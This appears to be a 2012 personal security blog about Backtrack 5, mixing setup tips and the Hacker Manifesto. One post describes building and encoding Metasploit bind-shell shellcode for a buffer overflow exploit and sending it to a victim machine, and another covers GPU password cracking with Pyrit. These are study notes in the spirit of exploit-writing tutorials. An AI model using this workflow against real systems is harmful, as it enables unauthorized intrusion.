Saturday, November 10, 2012

Installing Google Chrome in Backtrack 5

As many of you have noticed, Google Chrome doesn't come installed in Backtrack 5.
So, in this post we will learn how to install it.
The installation was done on Backtrack 5 R3.


Step 1

Open a new command session and type:

apt-get install chromium-browser

Step 2

Access the chrome browser directory:

cd /usr/lib/chromium-browser

Buffer Overflow - Some thoughts

In this post I'll talk about Buffer Overflow Exploitation in Windows.

Keep in mind that this is not intended to teach you, or anything like that; this blog is for personal use, and will contain info that I don't wanna lose or forget. Anyway, I share it with everyone, so that it can be helpful for other people.

I learned about buffer overflows from the link below, one of the many tutorials of the corelan team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

That is an extremely good tutorial, one that you actually can follow and understand, and especially one that you can test yourself.

At the end of the tutorial you have a kind of challenge, where you should be able to make your shellcode get a telnet connection to the remote computer; getting that shellcode into the exploit is the challenging part.

The way I found to do it was:

Get the payload from msfpayload:

msfpayload windows/shell_bind_tcp


That will create the shellcode of a telnet connection with an open port at 4444 (the default).

Now, if you test it, it will not work, because it probably has nulls and bad chars not supported by the RMtoMP3 application, so we have to use an encoder.

Here comes the trick:

Step 1

Imagine this is the shellcode (this is just an example):

\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18
\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b
\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac
\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4
\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b

 
What you have to do is create a script that writes the shellcode into a binary file.
For this example, I will use Python as the scripting language:

#!/usr/bin/python

# The shellcode is kept as a bytes literal and written in binary mode, so the
# file holds the raw bytes on both Python 2 and Python 3 (a text-mode write of
# a str on Python 3 would UTF-8 encode every byte >= 0x80).
shell = (b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
with open('shellcode.bin', 'wb') as f:
    f.write(shell)

Step 2

After running the script you will have a shellcode.bin file. So now it is time to use our encoder:

msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c

Where:

-e ... -> is the type of encoder you want to use. You can get a list of them using msfencode -l

-b ... -> is the characters you want to avoid, in this case the null byte

-i ... -> is the file you want to encode

and

-t ... -> is the output format

With this all set, you now have the correct shellcode, and just need to add it to your own exploit.

Send it to the victim machine and Voilá!!!
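The check a practitioner wants around the two steps above, as an added example that is not from the original post: it parses the \xNN escape notation used in this post (the same notation msfencode -t c prints), writes the raw bytes in binary mode the way the script does, and reports every byte that falls in a bad-character set, so you can confirm the encoder's output is actually clean. The byte sample and the BAD_CHARS set are constructed, and the function names are mine.

```python
import re

# Bytes the target application mangles. The post passes only the null byte to
# msfencode -b; extend this set with whatever else the target rejects.
BAD_CHARS = b"\x00"

# Constructed sample: the example fragment quoted in the post, in the "\xNN"
# escape notation that msfencode -t c also emits.
SAMPLE_ESCAPED = r"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20"


def parse_escaped(text):
    """Convert \\xNN escapes (as printed by msfencode -t c, including any
    'unsigned char buf[] =' prefix, quotes and line breaks) into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(payload, bad=BAD_CHARS):
    """List (offset, byte) for every byte of payload that is in the bad set.
    An empty list means the payload is clean for this bad-character set."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def write_bin(payload, path):
    """Write raw bytes for msfencode -i. Binary mode matters: a text-mode
    write of str escapes on Python 3 would UTF-8 encode every byte >= 0x80."""
    with open(path, "wb") as f:
        f.write(payload)
    return len(payload)


if __name__ == "__main__":
    raw = parse_escaped(SAMPLE_ESCAPED)
    print("wrote", write_bin(raw, "shellcode.bin"), "bytes")
    # Run the same check on the msfencode output before using it.
    print("bad bytes:", find_bad_chars(raw))
```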

Saturday, November 3, 2012

Install Pyrit and the same as CUDA but now for ATI

In this post I present the counterpart of CUDA.

If you have an nVIDIA driver you should use CUDA, and for that you should follow this link: How to Install Cuda on nVIDIA Optimus

If that's not your case and you have an ATI you should go for OpenCL.

I could write a tutorial here on how to install it, but actually in the backtrack wiki you can find a very good one, done with the contribution of "g0tmi1k". Check it here: http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL

I'll show you some results I got using pyrit:

Hardware:

Running in 32Gb USB drive
OS: Backtrack 5 R3
Display Card: AMD Radeon HD 6950 DirectCUII 1GB GDDR5
CPU: Core 2 Quad Q6600 2.4Ghz
RAM: 4096MB



As far as I can say, I advise the use of ATI drivers to crack passwords, because they are really much faster than CUDA imo.

How to Install CUDA on nVIDIA Optimus with Backtrack 5 R3

In this post you will learn how to setup a notebook with nVidia Optimus technology working with CUDA.

All the information that I will present here would not be possible without the help of "Samiux", who helped me get through this problem.
You can find his blog here: http://samiux.blogspot.hk

This was tested in my own notebook with the below specs:

Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3


Fix Blank Screen when using Startx

When Backtrack 5 was released, the most common issue was a blank screen when using the "startx" command to start the GUI mode. This common issue is caused by unsupported VGA drivers on some machines. This blank screen issue is still found on Backtrack 5 R1, R2 and, recently, Backtrack 5 R3.
When I installed Backtrack 5 R3 I came across this problem, but managed to find a fix:
What we need to do is add some code to the Grub file.
If you're using a live CD or live USB you will come across the menu below, where you should select "Default Boot Text Mode" and press "Tab".
You should then add the following code "i915.modeset=1" to the grub editor after the "vga = 791 splash text" and press [enter].


If after installing Backtrack the problem persists, you should edit the Grub configuration file located in /etc/default/grub.
Find the line that says:

GRUB_CMDLINE_LINUX_DEFAULT

and add the same code "i915.modeset=1" after the "vga = 791 splash text".

After that, issue the update-grub and fix-splash commands.

It should be working properly now.
If not, check my next two fixes.






The Hacker Manifesto

My 1st post will go to this important manifesto in the hacker community.
The Manifesto was written in 1986 by Loyd Blankenship aka "The Mentor".

You can find the Manifesto below in text and in mp3, with "The Mentor" reading his own Manifesto and talking about it and his history.



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

                       \/\The Conscience of a Hacker/\/

                                      by

                               +++The Mentor+++

                          Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
        Damn kids.  They're all alike.

        But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker?  Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
        I am a hacker, enter my world...
        Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
        Damn underachiever.  They're all alike.

        I'm in junior high or high school.  I've listened to teachers explain
for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
Smith, I didn't show my work.  I did it in my head..."
        Damn kid.  Probably copied it.  They're all alike.

        I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

        And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
        "This is it... this is where I belong..."
        I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
        Damn kid.  Tying up the phone line again.  They're all alike...

        You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless.  We've been dominated by sadists, or
ignored by the apathetic.  The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

        This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals.  We explore... and you call us criminals.  We seek
after knowledge... and you call us criminals.  We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

        I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

                               +++The Mentor+++
_______________________________________________________________________________
 The Hacker Manifesto by "The Mentor".mp3